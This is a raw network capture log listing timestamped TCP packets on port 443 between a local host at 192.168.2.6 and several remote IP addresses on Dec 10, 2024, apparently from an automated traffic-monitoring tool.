                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.758047104 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.758085966 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.758099079 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763689995 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763715029 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763752937 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763761997 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763777018 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.763793945 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769484043 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769506931 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769547939 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769557953 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769579887 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.769603968 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.774586916 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.774612904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.774681091 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.774688959 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.774729967 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.780703068 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.780725956 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.780776978 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.780788898 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.780956984 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785834074 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785856009 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785893917 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785902023 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785928965 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.785949945 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.787154913 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.803138018 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.803163052 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.803193092 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.803201914 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.803245068 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.810384989 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944705009 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944735050 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944786072 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944817066 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944834948 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.944869995 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950566053 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950589895 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950633049 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950644016 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950668097 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.950687885 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.955569983 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.955591917 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.955640078 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.955648899 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.955684900 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.962085962 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.962111950 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.962199926 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.962208986 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.962246895 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967041969 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967063904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967101097 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967111111 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967138052 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.967155933 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972450018 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972469091 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972554922 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972554922 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972568035 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.972609043 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.978384972 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.978406906 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.978475094 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.978490114 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.978528976 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.984733105 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994781971 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994807959 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994846106 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994858980 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994920015 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:44.994932890 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.001048088 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.136962891 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.136987925 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.137052059 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.137075901 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.137130022 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142821074 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142843962 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142879963 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142889977 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142918110 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.142930984 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.148003101 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.148022890 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.148092031 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.148099899 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.148149967 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153491020 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153510094 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153551102 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153559923 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153585911 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.153605938 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159306049 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159333944 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159360886 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159373045 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159394979 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.159425974 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164769888 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164796114 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164834023 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164843082 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164860964 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.164880037 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170568943 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170592070 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170629978 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170643091 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170664072 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.170681000 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.174319029 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.186958075 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.186980009 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.187021017 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.187032938 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.187060118 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.187067986 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.189721107 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.329734087 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.329762936 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.329822063 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.329849958 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.329862118 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.330044031 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.335335970 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.335357904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.335413933 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.335432053 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.335469961 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.340919018 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.340940952 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.340981007 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.340992928 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.341018915 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.341027021 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345820904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345844030 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345881939 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345890999 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345920086 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.345938921 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351484060 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351505995 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351547003 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351557016 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351583004 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.351599932 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.356935024 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.356957912 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.356992960 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.357003927 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.357028008 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.357049942 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362591028 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362613916 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362657070 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362668037 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362689972 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.362721920 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.379323959 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.379344940 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.379400015 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.379410982 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.379534960 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.525047064 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.525073051 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.525146961 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.525168896 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.525222063 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.527445078 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.527463913 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.527499914 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.527513981 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.527548075 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.533590078 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.533607006 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.533677101 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.533691883 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.533723116 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537292004 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537334919 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537359953 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537370920 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537396908 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.537421942 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.563446045 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.976072073 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.976104975 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.976577997 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.977268934 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:45.977284908 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:47.556657076 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:47.556727886 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:47.556792021 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.227436066 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.227503061 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.229300022 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.229310989 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.229546070 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.232084990 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.232147932 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.232156038 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.238825083 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.279335022 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.699244022 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.699331999 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.699374914 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.701628923 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.701694012 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.701781034 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781111002 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781205893 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781372070 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781594992 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781604052 CET4434985220.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:48.781615973 CET49852443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.481929064 CET44349801172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.482014894 CET44349801172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.482254028 CET49801443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.484075069 CET44349802172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.484138966 CET44349802172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.484185934 CET49802443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.715306044 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.715396881 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:49.715461016 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:05.911218882 CET49899443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:05.911271095 CET4434989920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:05.911345959 CET49899443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:05.912415981 CET49899443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:05.912426949 CET4434989920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:08.140124083 CET4434989920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:08.141772032 CET49899443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:08.162935972 CET49899443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:08.162969112 CET4434989920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:08.163290024 CET4434989920.198.118.190192.168.2.6
